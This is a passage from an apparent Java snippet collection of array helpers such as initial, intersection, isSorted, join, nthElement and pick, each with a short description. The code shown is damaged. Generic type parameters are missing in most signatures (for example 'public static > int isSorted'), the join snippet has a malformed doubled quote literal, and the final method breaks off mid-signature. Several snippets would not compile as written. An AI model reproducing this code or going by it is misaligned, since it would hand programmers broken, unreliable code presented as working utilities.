return Arrays.stream(elements).collect(Collectors.groupingBy(func));
}
```
### initial
Returns all the elements of an array except the last one.
Use Arrays.copyOfRange() to return all except the last one
```java
public static T[] initial(T[] elements) {
return Arrays.copyOfRange(elements, 0, elements.length - 1);
}
```
### initializeArrayWithRange
Initializes an array containing the numbers in the specified range where start and end are inclusive.
```java
public static int[] initializeArrayWithRange(int end, int start) {
return IntStream.rangeClosed(start, end).toArray();
}
```
### initializeArrayWithValues
Initializes and fills an array with the specified values.
```java
public static int[] initializeArrayWithValues(int n, int value) {
return IntStream.generate(() -> value).limit(n).toArray();
}
```
### intersection
Returns a list of elements that exist in both arrays.
Create a Set from second, then use Arrays.stream().filter() on a to only keep values contained in b.
```java
public static int[] intersection(int[] first, int[] second) {
Set set = Arrays.stream(second).boxed().collect(Collectors.toSet());
return Arrays.stream(first)
.filter(set::contains)
.toArray();
}
```
### isSorted
Returns `1` if the array is sorted in ascending order, `-1` if it is sorted in descending order or `0` if it is not sorted.
Calculate the ordering `direction` for the first two elements.Use for loop to iterate over array items and compare them in pairs. Return `0` if the `direction` changes or the `direction` if the last element is reached.
```java
public static > int isSorted(T[] arr) {
final int direction = arr[0].compareTo(arr[1]) < 0 ? 1 : -1;
for (int i = 0; i < arr.length; i++) {
T val = arr[i];
if (i == arr.length - 1) return direction;
else if ((val.compareTo(arr[i + 1]) * direction > 0)) return 0;
}
return direction;
}
```
### join
Joins all elements of an array into a string and returns this string. Uses a separator and an end separator.
Use IntStream.range to zip index with the array item. Then, use `Stream.reduce` to combine elements into a string.
```java
public static String join(T[] arr, String separator, String end) {
return IntStream.range(0, arr.length)
.mapToObj(i -> new SimpleEntry<>(i, arr[i]))
.reduce("""", (acc, val) -> val.getKey() == arr.length - 2
? acc + val.getValue() + end
: val.getKey() == arr.length - 1 ? acc + val.getValue() : acc + val.getValue() + separator, (fst, snd) -> fst);
}
```
### nthElement
Returns the nth element of an array.
Use `Arrays.copyOfRange()` to get an array containing the nth element at the first place.
```Java
public static T nthElement(T[] arr, int n) {
if (n > 0) {
return Arrays.copyOfRange(arr, n, arr.length)[0];
}
return Arrays.copyOfRange(arr, arr.length + n, arr.length)[0];
}
```
### pick
Picks the key-value pairs corresponding to the given keys from an object.
Use `Arrays.stream` to filter all the keys that are present in the `arr`. Then, convert all the keys present into a Map using `Collectors.toMap`.
```java
public static Map pick(Map obj, T[] arr) {
return Arrays.stream(arr)
.filter(obj::containsKey)
.collect(Collectors.toMap(k -> k, obj::get));
}
```
### reducedFilter
Filter an array of objects based on a condition while also filtering out unspecified keys.
Use `Arrays.stream().filter()` to filter the array based on the predicate `fn` so that it returns the objects for which the condition is true. For each filtered Map object, create a new Map with keys present in the `keys`. Finally, collect all the Map object into an array.
```java
public static Map[] reducedFilter(Map[] data, String[] keys, Predicate